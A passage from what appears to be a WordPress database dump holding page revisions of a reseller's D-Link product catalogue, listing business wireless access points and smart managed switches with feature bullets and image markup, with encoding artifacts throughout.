with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 12:28:54','2019-09-25 04:28:54','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0),(3360,1,'2019-09-25 12:29:06','2019-09-25 04:29:06','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"500\" height=\"500\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w\" sizes=\"(max-width: 500px) 100vw, 500px\" />											\n		<p>Â 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>Weather-proof design (IPX6) built to withstand harsh environments</p><p>Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>Provides WLAN partitioning for deployments such as wireless hot spots</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>â€¢ MU-MIMO with beamforming</p><p>â€¢ Band steering</p><p>â€¢ Gigabit PoE-capable LAN port</p><p>â€¢ AP Array utility support</p><p>â€¢ Free D-Link Central WiFiManager</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Enjoy High-performance Wireless Connectivity</p><p>â€“ Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><p>MU-MIMO with Beamforming</p><p>â€“ Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><p>Multiple Operational Modes</p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ High-speed wireless performance with 300 Mbps wireless signal rates</p><p>â€¢ Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>â€¢ Gigabit Ethernet port with 802.3af Power over Ethernet</p><p>â€¢ Multiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>â€¢ Support Inbuilt Radius server, Network Access protection (NAP)</p><p>â€¢ Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>â€¢ Support Central WiFi Manager to configure and manage multiple AP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports<br />â€¢ Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 12:29:06','2019-09-25 04:29:06','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0),(3361,1,'2019-09-25 12:29:28','2019-09-25 04:29:28','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"500\" height=\"500\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w\" sizes=\"(max-width: 500px) 100vw, 500px\" />											\n		<p>Â 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>Weather-proof design (IPX6) built to withstand harsh environments</p><p>Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>Provides WLAN partitioning for deployments such as wireless hot spots</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>â€¢ MU-MIMO with beamforming</p><p>â€¢ Band steering</p><p>â€¢ Gigabit PoE-capable LAN port</p><p>â€¢ AP Array utility support</p><p>â€¢ Free D-Link Central WiFiManager</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Enjoy High-performance Wireless Connectivity</p><p>â€“ Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><p>MU-MIMO with Beamforming</p><p>â€“ Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><p>Multiple Operational Modes</p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ High-speed wireless performance with 300 Mbps wireless signal rates</p><p>â€¢ Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>â€¢ Gigabit Ethernet port with 802.3af Power over Ethernet</p><p>â€¢ Multiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>â€¢ Support Inbuilt Radius server, Network Access protection (NAP)</p><p>â€¢ Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>â€¢ Support Central WiFi Manager to configure and manage multiple AP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports<br />â€¢ Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			